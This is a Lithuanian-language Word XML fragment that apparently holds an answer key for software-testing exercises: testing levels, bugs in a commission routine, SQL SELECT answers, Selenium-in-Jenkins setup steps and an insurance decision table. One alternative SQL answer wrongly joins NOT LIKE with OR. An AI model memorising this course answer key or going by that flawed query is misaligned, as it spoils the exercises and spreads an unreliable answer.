        <w:t>komponentų testavimas; modulio testavimas; integracijos testavimas; sistemos testavimas; sistemų integracijos testavimas; Priėmimo testavimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Komentarai: modulio testavimas gali b</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ūti supra</w:t>
      </w:r>
      <w:r w:rsidR="00F54152" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ntamas, kaip vieneto, susidedančio iš</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kelių komponentų testavimas; sistemų integracijos testavimas gali būti atliekamas kai atskirų sistemų testavimas jau yra atliktas. Gali būti daugiau testavimo lygių, priklausomai nuo projekto konteksto. Kartais</w:t>
      </w:r>
      <w:r w:rsidR="00F54152" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tie patys pavadinimai gali rei</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00F54152" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti skirtingus dalykus skirting</w:t>
      </w:r>
      <w:r w:rsidR="00C06BEA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ose projektuose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Planavimas ir kontrolė, Analizė ir dizainas, testų vykdymas, stebėjimas ir ataskaitų teikimas, testavimo uždarymo veiklos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>b)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">reikia </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>4 test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2,3,4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nėra nustatytos pradinės reikšmės kintamiesiems, tas ypač svarbu commission_hi atveju; 2) Galimas begalinis ciklas; 3) Commission_lo nėra naudojamas, jis nereikalingas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1021"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SELECT FirstName, LastName FROM table1 WHERE City &lt;&gt; ‘London’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1021"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1021"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SELECT FirstName, LastName FROM table1 WHERE FirstName LIKE ‘[A,M]%’; Arba SELECT FirstName, LastName FROM table1 WHERE FirstName LIKE ‘A%’ OR FirstName LIKE ‘M%’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="1021"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SELECT * FROM table1 WHERE FirstName NOT LIKE ‘[A,M]%’; Arba SELECT FirstName, LastName FROM table1 WHERE FirstName NOT LIKE ‘A%’ OR FirstName NOT LIKE ‘M%’;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reikia parsisiųsti Selenium Server filą pvz: selenium-server-standalone-2.33.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Išsaugoti Selenium IDE įrašytus testus HTML formatu, išsaugoti tame pačiame aplanke, pvz. TestCase.html, TestSuite.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Jenkins sistemoje įsidiegti įskiepį Seleniumhq. Suderinti Selenium vykdymo įrankį </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Selenium runner (Manage Jenkins &gt; Configure System &gt; Selenium Remote Control: htmlSuite Runner &gt; {kelias iki katalogo su testais}). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Suderinti "darbą": </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Job -&gt; Job Name -&gt; Configure -&gt; Build -&gt; SeleniumHQ htmlSuite Run-&gt; browser: *firefox startURL: {kelias iki testuojamos programos} suiteFile: C:\Scripts\Suite.html resultFile: C:\Scripts\results.html`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tačiau toks būdas yra neefektyvus ir nepatartina vykdyti SeleniumIDE testų per Jenkins, nes gali kilti problemų dėl testų stabilumo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testavimo efektyvumas, Nuoseklumas, Patikimumas, Tikslumas, Greitis, Geresnė testavimo aprėptis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005C2CE7" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2CE7">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėkmės</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">scenarijų atvejais užtektų </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>6 testavimo atvej</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pP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1"/>
        <w:gridCol w:w="519"/>
        <w:gridCol w:w="519"/>
        <w:gridCol w:w="519"/>
        <w:gridCol w:w="805"/>
        <w:gridCol w:w="805"/>
        <w:gridCol w:w="803"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="2268"/>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2997" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>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Draudimo sutarties tipas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="262"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Kelionės draudimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="262"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Turto draudimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="262"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Sveikatos draudimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406"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9D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Draudimas nuo</w:t>
            </w:r>
          </w:p>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nelaimingų atsitikimų</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406"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9D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Transporto priemonės</w:t>
            </w:r>
          </w:p>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draudimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Civilinės atsakomybės</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Draudimas</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kelionės draudimo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turto draudimo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sveikatos draudimo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draudimo nuo nelaimingų atsitikimų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transporto priemonės draudimo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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>civilinės atsakomybės draudimo sutartis</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N</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Cs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>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t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti kelionės draudimo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lastRenderedPageBreak/>
              <w:t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti turto draudimo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t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti sveikatos draudimo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t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti draudimo nuo nelaimingų atsitikimų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t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti transporto priemonės draudimo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r>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2997" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>Apskaičiuoti civilinės atsakomybės draudimo bazinę įmoką</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
